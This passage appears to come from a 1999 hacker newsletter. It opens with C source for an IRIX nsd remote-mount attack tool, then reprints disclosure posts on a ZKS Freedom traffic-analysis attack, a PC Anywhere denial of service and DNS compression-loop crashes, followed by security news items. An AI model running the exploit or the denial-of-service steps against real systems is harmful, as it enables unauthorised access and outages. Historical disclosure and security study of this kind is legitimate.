/* Socket address we'll fill in with our destination IP and port. */
struct sockaddr_in sin;
/* All zero file handle. This appears to be the base handle for the nsd
filesystem. Great security, huh? */
unsigned char fh[NFS_FHSIZE] = { 0 };
/* NFS mount options structure to pass to mount(2). The meanings of these
are documented to some extent in /usr/include/sys/fs/nfs_clnt.h. The
flags field indicates that this is a soft mount without log messages,
and to set the initial timeout and number of retries from fields in
this structure. The fh field is a pointer to the filehandle of the
mount point, whose size is set by fh_len. As noted above, the mount
point filehandle is just 32 zeroes. */
struct nfs_args nx =
{
&sin, /* addr */
(fhandle_t *) fh, /* fh */
NFSMNT_SOFT|NFSMNT_TIMEO|NFSMNT_RETRANS|NFSMNT_NOAC, /* flags */
0, /* wsize */
0, /* rsize */
100, /* timeo */
2, /* retrans */
0, /* hostname */
0, /* acregmin */
0, /* acregmax */
0, /* acdirmin */
0, /* acdirmax */
0, /* symttl */
{ 0 }, /* base */
0, /* namemax */
NFS_FHSIZE, /* fh_len */
/* On IRIX 6.4 and up there are also the following... */
/* bdsauto */
/* bdswindow */
/* On IRIX 6.5 there are also the following... */
/* bdsbuflen */
/* pid */
/* maxthreads */
};
void usage (void)
{
fprintf (stderr, "usage: nsmount_remote directory host port\n\n");
fprintf (stderr, "NFS-mounts the virtual filesystem exported by nsd on <host> via NSD daemon\n");
fprintf (stderr, "port <port> onto <directory>.\n\n");
exit (1);
}
int main (int argc, char **argv)
{
char *dir;
char *host;
char *ports;
int port;
struct hostent *h;
int fstype;
FILE *mtabf;
struct mntent mnt =
{
0,
0,
NSD_FSTYPE,
"soft,timeo=100,retrans=2",
0,
0,
};
if (argc != 4)
usage ();
dir = argv[1];
host = argv[2];
port = atoi ((ports = argv[3]));
/* Prepare for host lookup. */
memset ((void *) &sin, 0, sizeof (sin));
sin.sin_family = 2;
sin.sin_port = port;
/* Look up the host. */
if (inet_aton (host, &sin.sin_addr))
;
else if ((h = gethostbyname (host)))
{
unsigned long *l = (unsigned long *) *(h->h_addr_list);
sin.sin_addr.s_addr = l[0];
}
else
{
fprintf (stderr, "Cannot resolve host %s.\n", host);
return 1;
}
/* Get filesystem type index for nsd filesystem type. */
if ((fstype = sysfs (GETFSIND, NSD_FSTYPE)) < 0)
{
perror ("sysfs (" NSD_FSTYPE ")");
return 1;
}
fprintf (stderr, "Mounting nsd " NSD_FSTYPE " fs from %s(%s):%d onto %s\n",
host, inet_ntoa (sin.sin_addr), port, dir);
/* These flags are documented in /usr/include/sys/mount.h. MS_DOXATTR
means "tell server to trust us with attributes" and MS_DATA means
"6-argument mount".
MS_DOXATTR is a mount option in IRIX 6.4 and up. The attack doesn't
seem to work without this option. So even though this program will
compile on IRIX 6.2, you need to use an IRIX 6.4 or higher OS to
attack nsd. */
if (mount (dir, dir, MS_DOXATTR|MS_DATA, (char *) fstype, &nx, sizeof (nx))
!= 0)
{
perror ("mount");
return 1;
}
/* Record mount point in /etc/mtab. */
mnt.mnt_fsname = malloc (strlen (host) + sizeof (":nsd@") + strlen (ports) + 1);
sprintf (mnt.mnt_fsname, "%s:nsd@%s", host, ports);
mnt.mnt_dir = dir;
if (!(mtabf = setmntent (MTAB_FILE, "r+")))
{
perror ("setmntent");
return 1;
}
if (addmntent (mtabf, &mnt) < 0)
{
perror ("addmntent");
return 1;
}
if (endmntent (mtabf) < 0)
{
perror ("endmntent");
return 1;
}
return 0;
}
@HWA
25.0 a practical attack against ZKS Freedom
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From PacketStorm http://www.genocide2600.com/~tattooman/new.shtml
Date: Sat, 29 May 1999 15:30:24 -0700
From: Wei Dai <weidai@eskimo.com>
To: cypherpunks@toad.com, coderpunks@toad.com
Subject: a practical attack against ZKS Freedom
Although the ZKS Freedom AIP protocol (as described in version 1.0 of the
ZKS whitepaper) is conceptually similar to the PipeNet protocol, there are
several attacks against ZKS which PipeNet is not susceptible to. The
reason is that PipeNet uses end-to-end traffic padding, whereas ZKS only
uses link padding. I came up with several attacks against link padding
systems while developing PipeNet, which is why I ultimately choose
end-to-end padding. However one can argue that end-to-end padding is too
costly, and that these attacks are not practical because they require a
global observer or the cooperation of one or more of the anonymous router
(AIP) operators. ZKS has not publicly made this argument, but since they
are probably aware of these earlier attacks they must have followed its
reasoning.
I hope the practicality of the new attack presented here will change their
mind. In this attack, a user creates an anonymous route from himself
through a pair of AIPs back to himself. He then increases the traffic
through this route until total traffic between the pair of AIPs reach the
bandwidth limit set by the ZKS Traffic Shaper. At this point the AIPs no
longer send any padding packets to each other, and the real traffic
throughput between them can be deduced by subtracting the traffic sent by
the attacker from the bandwidth limit.
This attack implies that link padding buys virtually no security. An
attacker, without access to network sniffers or cooperation of any AIP
operator, can strip off link padding and obtain real-time throughput data
between all pairs of AIPs. If end-to-end padding is not used, this data
would correlate with traffic thro
ughput of individual users, and
statistical analysis could then reveal their supposedly anonymous routes.
@HWA
26.0 DoS against PC Anywhere
~~~~~~~~~~~~~~~~~~~~~~~~
From PacketStorm http://www.genocide2600.com/~tattooman/new.shtml
Date: Fri, 28 May 1999 12:02:15 -0700
From: Chris Radigan <radigac@CERF.NET>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: DoS against PC Anywhere
Hello all,
This is my first post to the group so I'll try to keep it as brief as
possible. Searching through the bugtraq archives, I came across articles
001732, 001734, 001737, and 001739 regarding PC Anywhere. So, I fired up my
telnet client, pointed it at port 5631 on a non-production host, and pasted
about 512kb of garbage (I copied & pasted a dll I opened in notepad) into it
when PC Anywhere responded with "Please press <Enter>". About 200k through
this dump, PC Anywhere hangs, utilizing 100% of the CPU, rendering the
target host useless but not crashing it. There's your DoS.
I ran this attack over TCP/IP against a couple of fully patched NT 4.0
Workstations (SP4), and a couple of fully patched NT 4.0 Servers (SP4), with
802up_a, 802up_b, and hostup_b applied to PC Anywhere, RAS was not installed
on any of the hosts. I got the same results on all machines.
I got in touch with Symantec development and found out that they do have a
fix for this problem, it's a patched aw32tcp.dll, it just hasn't made it to
their website yet. I have applied this fix to several machines (all with
the afore mentioned PC Anywhere patches applied) and it does indeed fix the
problem.
Hope this info will help. Thanks for your time.
Chris
-----------------------------------------------------------------------------
Date: Mon, 31 May 1999 22:24:50 +0200
From: MrJay@GMX.NET
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Re: DoS against PC Anywhere
Hello TRAQers,
this is my second list-posting attempt, so please bear with me. Flames will be sent to /dev/nul anyways ;)
Concerning PC Anywhere 32 v8.0x, I tried the following attacks:
NT 4.0 Workstation (SP4) vs. NT 4.0 Workstation (SP4)
and
Win 98 (no patches, from what I was told) vs same NT 4.0 Workstation (SP4)
All NT 4.0 running PC Anywhere 32 8.0 patched with formerly mentioned Updates except the aw32tcp.dll, which wasn't available to
me. Major difference between Chris' and this version: I tested against the German version of PC Anywhere 32. RAS installed, no
fancy firewalls, no 'special' security implemented.
Not surprisingly the German Version of PC Anywhere didn't react much different. It hung when I posted those ~500KB of trash from
the NT 4.0 attacker machine to Port 5631 of the PC Anywhere Host. Result: 100% CPU load, further connections blocked though the
Host machine itsself still worked fine and was able to terminate the aw32host service by simply re-starting the Host mode in PC
Anywhere.
The more interesting one was the Win98 attack. Same procedure, different result. After pasting those 500KB the Server jumps to
100% load for some seconds while working through the trash then it drops back to normal with the attacker's Telnet session again
prompting for pressing the 'Enter' key. To make it short, a permanent DoS failed with a Win98 attacker's machine though
generating quite some load to the host's 486 CPU ;-) Pheww...because this keeps us safe from about 99% of all attacks ;)
Further difference: After pressing 'Enter' (unlike in the NT4.0 attack, where you loose connection) you are prompted for a
Username and password.... Could this be due to different possible Host Type options in Telnet (VT 52 on the Win98 vs. VT 100 on
NT 4.0)? In this case, could this also be the reason for the different reaction to the attack? Comments?
In case this one gets through, thank you for your time.
Jay.
P.S.: Does anyone know about the release date of the German NT 4.0 Service Pack 5? I couldn't get information on that via the
German or U.S. Web-Site.
-----------------------------------------------------------------------------
Date: Mon, 31 May 1999 13:34:34 +0200
From: Craig Hind <hindc@icon.co.za>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Re: DoS against PC Anywhere
Hi,
I managed to replicate this and checked Symantec's FTP site. There is a new
aw32tcp.dll there dated May 26, 1999. I got it and patched one of my
machines and it seems to work, although the description of the file on
ftp.symantec.com/public/english_us_canada/products/pcanywhere/pcanywhere32/v
er8.0/updates does not mention a denial of service.
Regards
Craig
> -----Original Message-----
> From: Chris Radigan [mailto:radigac@CERF.NET]
> Sent: Friday, May 28, 1999 21:02
> To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
> Subject: DoS against PC Anywhere
>
@HWA
27.0 weaknesses in dns label decoding, denial of service attack (code included) (fwd)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From PacketStorm http://www.genocide2600.com/~tattooman/new.shtml
Date: Sun, 30 May 1999 17:16:22 +0200 (CEST)
From: Sebastian <scut@nb.in-berlin.de>
To: packetstorm@genocide2600.com
Subject: weaknesses in dns label decoding, denial of service attack (code included) (fwd)
Parts/Attachments:
1 Shown 87 lines Text
2 1.8 KB Application, "zlip.tar.gz"
----------------------------------------
keywords: some dns packet decoders (sniffers, ids systems (?), dns
servers) may be vulnerable to malformed compressed domain names
inside dns packets.
hi,
as I played with the DNS RFC (1035 especially) i came up with the idea to
create malformed compressed dns domains inside the DNS packet to make it
impossible for the DNS packet decoder to decompress it, which might lead
to a denial of service attack.
On my tests I found my BIND servers resisting all attacks (three different
types), but all sniffers I used to view the DNS packets send to the
server behaved in a very "special" way.
First test (pointing-to-itself-compression (zlip-1.c))
The DNS domain consists out of multiple labels, and message "compression"
allows you to let a pointer point to a previous label inside the packet,
to save bytes in the DNS packet. I just created a pointer that points to
itself, meaning on a recursive domain decompression (like etherreal uses),
this will produce effects like segfaulting or hanging.
Etherreal alloc's memory until the system crashes, tcpdump stopped working
before the packet is received, on SIGINT, it displays the malformed
packet, but dropped all other packets:
14:57:59.025013 128.75.9.2.48078 > victim.ns.org.domain: 30993 Type49159
(Class 49168)?
Second test (crossreferencing pointers (zlip-2.c))
Similar to the first code, but now two pointer are used to reference each
other, speeding up the effect on Etherreal.
Results are the same as in the first test.
Third test (very long label, decompressed multiple times (zlip-3.c))
This time I used a long label (maximum of 63 characters), and referenced
to it a dozend times, this will decode to a very long domain, therefore
it may overflow some fixed-sized-buffers (because the rfc says "limited to
500 characters" some programmers may prefer fixed buffers for dns
decoders). This is the case in Etherreal, where such a request creates a
segmentation fault (due to a buffer overrun).
I just tested this with BIND as nameserver, which resisted all this tests,
but I included the "exploit" code in this email to allow you to test your
IDS, sniffers and nameservers against this.
cu,
scut
--
- scut@nb.in-berlin.de - http://nb.in-berlin.de/scut/ - sacbuctd@ircnet --
-- you don't need a lot of people to be great, you need a few great to be --
-- the best -----------------------------------------------------------------
[ Part 2, "zlip.tar.gz" Application/X-GUNZIP 2.4KB. ]
------------------------------------------------------------------------------------
Date: Mon, 31 May 1999 17:49:53 -0400
From: bobk <bobk@SINISTER.COM>
To: BUGTRAQ@netspace.org
Subject: Re: weaknesses in dns label decoding, denial of service attack (code included)
On Sun, 30 May 1999, Sebastian wrote:
>
> keywords: some dns packet decoders (sniffers, ids systems (?), dns
> servers) may be vulnerable to malformed compressed domain names
> inside dns packets.
>
> sorry aleph1, if this has already been known or posted =)
>
>
> hi,
>
> as I played with the DNS RFC (1035 especially) i came up with the idea to
> create malformed compressed dns domains inside the DNS packet to make it
> impossible for the DNS packet decoder to decompress it, which might lead
> to a denial of service attack.
Another thing to remember is that it is possible to put ABSOLUTELY
ANYTHING inside a DNS domain name. This includes whitespace, control
characters, and even NULL.
Imagine what could happen if some program did a strcmp() on the following
name:
rs.internic.net\0.xa.net
where, of course, \0 is a null
Interested readers may ponder what type of programs may be exploited with
this type of attack.
@HWA
28.0 Microsoft Worker Raided
~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Code Kid
VallaH, one of the victims of the recent FBI raids, was a
contractor for Microsoft working on Windows 2000
interoperability. Although he was not arrested and
charges have not been filed against him he still lost his
job. This of course raises the question of who is working
where? Do employers really know the backgrounds of
their employees? Is there anyway to tell?
MSNBC
http://www.msnbc.com/news/275876.asp
Perils of moonlighting as a hacker
Microsoft employee was raided by FBI last week; are hackers working
all over the software industry?
By Bob Sullivan
MSNBC
June 2 Everybody does it; nobody wants to talk about it. Computer hackers white hat or
black hat are among the brightest minds in the software industry, so many are hired by
big-name software companies. Then they dance the awkward dance of dual identities, engineer
by day, hacker by night. The consequences of a misstep in that dance can be severe, as a hacker
calling himself VallaH learned last week. In his case, a visit from the FBI meant the end of
his career at Microsoft, embarassment for the largest software company in the world, and a
new focus on the role of hackers at work.
JEFFREY ROBERSON, 19, was a self-described
angry little kid two years ago, fairly well-known as VallaH
on the hacking scene, dabbling in writing hacker software
tools. At his worst, he says, he participated in relatively
benign denial-of-service attacks coordinated efforts to
try to overwhelm a Web site with hits so it becomes
unavailable. Then a Microsoft employee saw his
programming code, was duly impressed and invited VallaH
to Redmond, Wash. Over time, Roberson was convinced to
put his skills to good use and took the job. Hes spent the
past year working on Windows 2000, testing for
interoperability with Unix systems his specialty.
(Note: Microsoft is a partner in MSNBC.)
But he also stayed involved in the hacker scene. He
says he hadnt done anything illegal since taking his job at
Microsoft; in fact he says he spent his time trying to
convince other angry little kids that they could be creative
instead of destructive. I talked to them because I wanted to
try to help them program.
But someone passed his handle to the FBI recently.
Then his Seattle-area apartment was raided May 26 in the
hacker sweep, and VallaHs life instantly changed. He was
immediately fired by Microsoft and went back home to his
parents in the Baltimore area.
IM ASHAMED THEYRE INVOLVED
Some people
who had
absolutely nothing
to with with
hacking at all
[were raided].
People with
things going for
them, innocent
people, who are
going to face
consequences.
JEFFREY ROBERSON
Its Microsoft policy; I understand where theyre
coming from, Roberson said of his dismissal. He was
actually a contractor at Microsoft, working through the Volt
Computer agency. Im more of a liability than an asset.... I
owe a great debt to Microsoft, and Im really ashamed that
theyre involved.
Are other hackers working at Microsoft? Does the
company recruit in the underbelly of the Internet, places like
Internet Relay Chat rooms set up for hackers? The
company wouldnt say.
We dont recruit people who are involved in illegal
activities, spokesman Adam Sohn said. But did one
computer scientist see [VallaHs code] and thought, gee,
this is ... great work, we should get this person? Surely that
may happen.
Other software firms wouldnt discuss company
policies about hiring hackers when contacted for this article
but hackers say the practice is common and
complicated.
ITS ONLY NATURAL
It is only natural to assume that someone who defaces
Web pages at night also works for a computer-related
company, said a man calling himself Space Rogue. Rogue
works for L0pht Heavy Industries, a company of
professional hackers that is hired by firms to test
corporate system security.
Last place I worked I tried to keep my involvement
with L0pht and stuff quiet. Then word got around, as it
always does. Then I get treated like royalty, and people tell
me all the dirty deeds they have done to the company
systems. Back doors, reading the bosss e-mail, all kinds of
s***. I just shake my head and wonder.
The issue is most employers have no idea what the
background is of their employees. I mean, its not like
youre going to put defaced 150 Web sites on your
resume. And unless you have been arrested, no background
check is going to turn anything up.
FIND A HOLE, GET A JOB
On the other hand, exposing security holes in front of
the world is even better than a resume, said Russ Cooper,
who moderates the most popular information service
covering Windows NT security. His NTBugTraq mailing list
has 25,000 subscribers, and his Web site gets 2 million hits
a month.
The issue is most
employers have no
idea what the
background is of
their employees. I
mean, its not like
youre going to
put defaced 150
Web sites on
your resume.
SPACE ROGUE
L0phy Heavy Industries
A lot of people release exploit information to get
jobs, Cooper says. Posting an exploit, or a security hole, to
his list is one sure way to get the attention of software firms.
Certainly I know of people who have posted and gotten
job offers. Companies are interested in people who have
demonstrated an aptitude for discovering problems. Finding
people with skills is hard.
But is it worth the risk? No, says Christopher Klaus,
who founded Internet Security Systems Inc. The company
writes software designed to automatically test for exploitable
security holes, so-called scanning software. For ISS
software to work, his programs must imitate the thought
process of hackers still Klaus says he ignores the
resumes he gets from hackers.
We find we have more success finding people with a
networking background, people who know Unix and can
program in C++, then train them in security. That works
better than the other way around, he said.
HAVING A HACKER ON STAFF
Whats more fun
than a buddys
reaction when the
CD-drive door is
opened
mysteriously. :)
CARL-FREDRIK NEIKTER
Having a hacker on staff is complicated because of the
vague distinctions often made between white hat, black
hat, hackers and crackers. Anyone involved in computer
security might be called a hacker (in fact, many say anyone
involved in any kind of progamming is a hacker). Computer
security administrators consider hacker mailing lists, Web
pages and even chat rooms as part of their daily reading
material, a requirement for keeping their systems secure
against the latest exploits.
And theres all manner of playful hacking that goes on
inside a company. One Microsoft employee told MSNBC
that groups within the company sometimes hack each
others Web pages, a harmless form of taunting.
But when does that kind of playfulness cross the line,
become harmful? Many hackers dont believe temporarily
defacing a Web page is destructive, though it is illegal. But
what of the authoring of hacker tools, which are not
illegal? For example, there are software packages used to
scan Web sites for vulnerabilities; they are equally useful to
security administrators testing their own systems and
hackers looking for open doors. Other software simply
makes it easy for someone whos less skilled to hack into
Web sites. Thats what Roberson was writing when
Micosoft contacted him he was one of many coders
who write and distribute software that can be used to crack
Web sites, then share it with a wink, saying theyre not
responsible for how others use it.
HACKING TOOLS
Among the most popular examples is NetBus, which
allows a hacker to control a victims PC from anywhere on
the Internet, right down to opening and closing the
CD-ROM door. Its author, Carl-Fredrik Neikter, said he
wrote NetBus solely to have a fun program. Whats more
fun than a buddys reaction when the CD-drive door is
opened mysteriously. :) I didnt think about trojans or a
hacking tool. Hes now trying to market the tool as
commercial shareware.
Others who write such tools say theyre doing it to
draw attention to security holes that was the motivation
behind Back Orifice, written by members of the Cult of the
Dead Cow, according to member Sir Dystic.
While writing such software is not illegal, its also not
the kind of moonlighting many companies would be proud
of. But how much control does a company have over its
employees activity outside of work?
FACING CONSEQUENCES
According to Roberson, his Microsoft employers knew
he came from the scene, even knew he still communicated
with hackers. Only the embarrassment of the raid cost him
his job and he now regrets his past as a hacker.
I wish I didnt talk to these people, he said. But I
grew up in the scene, it was all I knew, it was who I was.
So he felt an obligation to keep up friendships and help
these kids.
But in the end those friendships cost him his job
and, says Roberson, others involved in the raids are facing
similar consequences.
Some people who had absolutely nothing to with with
hacking at all [were raided], he said. People with things
going for them, innocent people, who are going to face
consequences. He says others raided last week got in
trouble with school officials and employers but declined to
elaborate.
Such consequences and even threats of prosecution
and computer seizure made by the White House, CIA and
FBI dont seem to be deterring many hackers, who on
Wednesday continued to deface government Web sites.
@HWA
29.0 Is the FBI Missing the Point?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by McIntyre
With the focus of the FBI squarely on web page
defacers are more serious criminals being overlooked?
Are Scr1pt Kiddies really who the FBI should be worried
about? Or should they be searching for cyber crooks
whom you do not hear about, that stay in the shadows?
ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2269398,00.html
30.0 Norwegian Newspaper Cracked
~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by luyten
Two 17 year olds were arrested in their home by
Norwegian police. Both of them have admitted to
defacing the web page of Norway's biggest newspaper
"Aftenposten". They replaced the main page with a
graphic of three men urinating on the newspapers logo.
The defaced page was visible for approximately one and
a half hours. Both suspects risk getting a criminal record
and being sued for a large amount of money from
Aftenposten and Scandinavia Online (SOL) for their
alleged losses.
Aftenposten- Sorry it is in Norwegian
http://www.aftenposten.no/nyheter/nett/d84153.htm
HNN Cracked Pages Archive
http://www.hackernews.com/archive/crackarch.htm
31.0 Student Busted for Changing Grades
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by riot
Students at Evergreen High School in Washington state
paid a fellow student, Adam Jerome, $5 each to change
their grades on the school computer. Mr. Jerome now
faces a possible charge of computer trespass in the first
degree, a Class C felony, for which a first time offender
can receive as much as 90 days in jail. The purchasers
of the grades, one of whom was the principals daughter,
may be charged with being accomplices to a computer
trespass. (I'm not even going to get into all the FUD and
inaccuracies in this article)
The Columbian
http://www.columbian.com/06021999/front_pa/60760.html
HACKING SUSPECT MAY BE CHARGED
Wednesday, June 2, 1999
By TOM VOGT and RICHARD S. CLAYTON,
Columbian staff writers
It could be the fantasy of many computer-savvy
students: hacking into the school's data system and
changing your grades.
Now prosecutors are considering charges
against an Evergreen High School student accused
of using his home computer to raise grades for 22
classmates.
Twenty-three students were disciplined. One
was expelled, one was placed on long-term
suspension, and the rest received 10-day
suspensions.
The incident coincided with increasing national
attention to computer security in the wake of
high-tech vandalism against computers or Web
sites in the FBI, the U.S. Senate, the Department
of the Interior and a federal supercomputer
laboratory in Idaho.
The expelled student is senior Adam Jerome,
who was responsible for the hacking, according to
a district source.
The computer hacking affected "the integrity of
the whole system: kids working hard to earn
grades," Evergreen Principal Jim Hudson said
Tuesday.
Art Curtis, Clark County prosecutor, said his
office is studying the case and will decide whether
to file charges in the next week or so. The charge
would be computer trespass in the first degree, a
Class C felony. For a first offender, the maximum
sentence is 90 days in jail.
Kirby Neumann-Rea, district spokesman, said
each student paid $5 to have grades inflated. They
might face charges of being accomplices to a
computer trespass, Curtis said.
One of the students is Katy Hudson, daughter of
the Evergreen principal.
At least one student used the grade boost to get
a scholarship, Curtis said.
"This is not just a prank," Curtis said. "If there is
an issue of a potential scholarship, there is a
concern."
Some students received credit for courses they
never took.
District officials said computer security has
been upgraded since the incident. The school's
computers are part of a system used by 262
districts in the state.
The hacking started in February. When a
teacher heard about the grade boosts, school
officials investigated in April and confronted the
students.
"All the kids came clean," Hudson said, and that
included the computer expert.
"He sat down with us and gave us a complete
rundown," Hudson said.
The district also forwarded correct information
to colleges for the students involved.
All the seniors will graduate, although Jerome
will not go through the graduation ceremony.
Evergreen School District School operates its
own computer information system, which maintains
student grades as well as other records.
Evergreen's system is separate from the
regional data center maintained by Educational
Service District 112. All but one other Clark
County district (tiny Green Mountain) uses the
ESD's center to secure student grades and other
records.
The ESD is unaware of any hackers illegally
entering its system in recent years, said Marge
Cartwright, the ESD's director of communications
and information management.
Cartwright knows of two attempts to hack into
the ESD's data center. Both were unsuccessful.
"We feel confident in the security of the
system," Cartwright said. "We haven't had a
problem with students breaking into it. I'm not
concerned about that."
To access the ESD's system, a user or hacker
would need more than several passwords and a
confidential user name. They also would have to
navigate more than one "firewall." One of these
firewalls limits access by allowing only specific
computers at specific schools to enter, Cartwright
said.
Cartwright said she was unaware how the
student allegedly entered Evergreen's system, but
could also have used "sniffer" software that helps
decipher passwords and codes.
@HWA
32.0 FBI Lobbying Group Pushes for EavesDropping Capability
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by s3cr3t
The International Law Enforcement Telecommunications
Seminar (ILETS), a reportedly top secret international
lobbying group made up of police officers and security
agents from around the world, will attempt to convince
New Zealand's government that it needs to filter the
Internet. ILETS was founded by the FBI in 1993 to push
for wiretap abilities in worldwide communications and
has been heavily involved with the ENFOPOL 98 Affair
IDG News
http://www.idg.co.nz/nzweb/dfca.html
Telepolis
http://www.heise.de/tp/english/special/enfo/6398/1.html
Monday May 31
Lobby group pushes for Police email snooping
NZ Police refuse to comment
By Paul Brislen - AUCKLAND
An international lobby group aims to convince New Zealand's government that it should implement
laws requiring Internet service providers (ISP) to allow law enforcement officers access to
anyone's email.
The lobby group, the International Law Enforcement Telecommunications Seminar (ILETS), is
made up of police officers and security agents from a number of Western countries including New
Zealand and Australia. Hong Kong is also included.
Set up in 1993 by the FBI to push building universal wiretap-ability into worldwide communications,
ILETS now has its sights firmly set on tapping into the Internet and may have convinced a meeting
of European ministers to adopt its latest plan.
ILETS plans to lobby New Zealand's government to introduce similar laws here, although the
minister's press secretary, Jonathan Kinsella, says he has not heard of ILETS.NZ Police refuse to
comment
"That sounds more like an operational matter. That would be handled by national headquarters."
New Zealand Police does have a representative in ILETS but he would not comment on ILETS or
its role in New Zealand. "It's all supposed to be top secret. I'm surprised you got hold of the name
even," he says. He describes ILETS as an "advisory group" and feels that monitoring of Internet
communication is a "worldwide trend" of which New Zealand is only a part.
New Zealand law does not allow such interceptions to take place here and our strict privacy laws
would also cause ILETS some trouble. However, the group will be pushing the issue at a political
level.
Enfopol 19, the document currently before the European council of ministers, requires
manufacturers and operators to build in "interception interfaces" to the Internet and all future digital
communications systems. Under the scheme, European ISPs would be required to install
monitoring equipment or software on site. The European governments would then have the
capability to track an individual's "static and dynamic IP address . credit card number and email
address", according to the leaked Enfopol 19 document, available at the Foundation for Information
Policy Research's (FIPR) Web site (www.fipr.org).
FIPR, which describes itself as "an independent body that studies the interaction between
information technology and society", is based in the UK and has been following ILETS since its
cover was blown by the German online publication Telepolis. In the UK, opposition from ISPs is
growing.
"Anything along the lines [of the ENFOPOL scheme] would probably have astronomical cost
implications," says Keith Mitchell, chairman of the London Internet Exchange. "In the event such a
scheme was ever implementable, the costs should be met by the enforcement authorities. Since the
industry cannot afford it I doubt the public sector could." Mitchell doubts whether such a scheme
would work on a technical level, something that Telecom is also concerned about.
"The amount of email going through Xtra's email servers is around five times the volume it was last
year and it's accelerating," says spokesman Glen Sowry. Telecom has recently installed a new
email server which is scalable up to a million users.
"At this stage you would have to take into consideration the sheer volumes of what you are trying
to achieve."
European ministers are to meet on May 27 to discuss the adoption of Enfopol 19.
More information can be found at: www.heise.de/tp/english/special/enfo/default.html.
@HWA
33.0 Cons, Cons and more Cons
~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Space Rogue
Several hacker conventions are either just around the
corner or in early planning stages. Hope 2000, the third
incarnation of the famous Hackers On Planet Earth do
not have an official date or location yet, but they do
have a webpage and it will probably be one of the
biggest Hacker Conventions ever. DNSCON is shooting
for its second year; to be held in Blackpool, England.
WraithCon is planning on Kent University. Hit2000 has
finnally announced a date in September. And don't
forget the old standbys Defcon, Summercon and others
that are just around the corner.
HNN Cons Page
http://www.hackernews.com/cons/cons.html
@HWA
34.0 Friday June 4th: FREE KEVIN Demonstrations Today!
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Macki
At approximately 2pm local time on Friday, June 4th,
people will gather outside at least 16 Federal
Courthouses across the country to protest the
continued incarceration of Kevin Mitnick. The
demonstrations hope to bring attention to the fact that
- Kevin has been denied a bail hearing
- Lack of access by the defense to critical evidence
- The outrageous claims by software companies as to
the amounts of damages caused by copying software.
- When this was reported by the media the court
blocked access to the defense to further information.
Kevin Mitnick has never been accused of being violent,
malicious, or getting any sort of compensation for his
acts and yet he has been in jail for over four years.
Longer than most armed robbers or rapists.
It is hoped that these peaceful demonstrations can
increase public awareness of this issue and hopefully
positively influence his sentencing hearing scheduled for
June 14th.
Official Press Release
http://www.hackernews.com/orig/mitnickpr.html
FREE KEVIN Demonstrations
http://www.2600.net/demo/
ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2269826,00.html
Salon
http://www.salon.com/tech/log/1999/06/04/mitnick/index.html
Already over, the demonstration in front of the US
Embassy in Moscow has been labeled a huge success.
This photo taken prior to the event shows some folks
from Civil Hackers' School in Moscow and a
conspicuously placed FREE KEVIN Sticker.
Moscow Demonstration Picture
http://www.hackernews.com/images/kewl4.html
The demonstration in Washington DC is going to try like
hell to webcast the event but their resources are
limited. You can try here or here. Hopefully one of them
will work.
http://www.SteveNet.net/2600/
http://members.xoom.com/gmontag/
There are rumors that several of the demonstrations,
especially the one in Atlanta which is the first event of
Summercon, will be broadcast live on CNN. We will do
our best to bring you updates as necessary.
http://www.summercon.org/
Late Update
The Philidelphia demonstartion is also attempting to web
cast their event. We should hopefully have a URL for
you soon.
Demonstration are also happening spontaneously in
cities that are not listed on the official web page. HNN
has received reports of a demonstration taking place in
Boston.
FOR IMMEDIATE RELEASE
NATIONWIDE DEMONSTRATIONS ON FRIDAY TO
PROTEST HACKER INCARCERATION
NATIONWIDE CONTACT: Emmanuel Goldstein,
917-945-26ØØ
On Friday, June 4 at 2 pm, demonstrations will take
place outside federal courthouses nationwide to
protest the continued incarceration of Kevin Mitnick,
imprisoned without bail in a pre-trial facility in Los
Angeles for over four years.
The demonstrations are being organized by the
FREE KEVIN movement and seek to shed light on
the many injustices of this case.
They include:
--) Mitnick's denial of a bail hearing, something even
a terrorist is given.
--) The inability of Mitnick's defense to have access
to the evidence against him, making it impossible for
them to mount an adequate defense.
--) The highly dubious claims of certain cellular
phone companies in letters obtained by us which
state that Mitnick's mere glancing at their source
code cost them hundreds of millions of dollars.
These losses were never reported to their
stockholders as required by the SEC.
--) When the media started to report on these
disclosures, the court's response was to prevent
any further documentation from being released.
Throughout this ordeal, Mitnick has never been
accused of doing anything malicious, profiting in any
way from his talents, or being a violent criminal. Yet,
since February 15, 1995 he has been locked away
with some of the most dangerous people around.
Our demonstrations will take place to spread the
word and put pressure on the appropriate
authorities to end this nightmare once and for all.
Even those who think Mitnick is guilty of everything
he's been accused of are outraged by his continued
incarceration. On June 14, the judge in his case will
have the option of recommending his immediate
release to a halfway house or extending his prison
term even longer.
For more information on the Mitnick case, check
www.freekevin.com. For more information on the
demonstrations, contact one of the above people or
check www.2600.com/demo.
@HWA
35.0 Germany Frees Crypto
~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Seraphic Artifex
German officials have released a statement on crypto
policy. The statement says that for the worldwide
protection against electronic interception and economic
espionage that the strongest crypto available will be
allowed to be used by German citizens. In addition the
crypto development community within Germany will be
supported and nurtured to create superior crypto
products. The statement claims that the need of
personal privacy and the protection e-commerce
overrides any possible use crypto may have for
criminals.
German cryptography policy statement
http://www.bmwi.de/presse/1999/0602prm1.html
English Translation
http://jya.com/de-crypto.htm
Wired
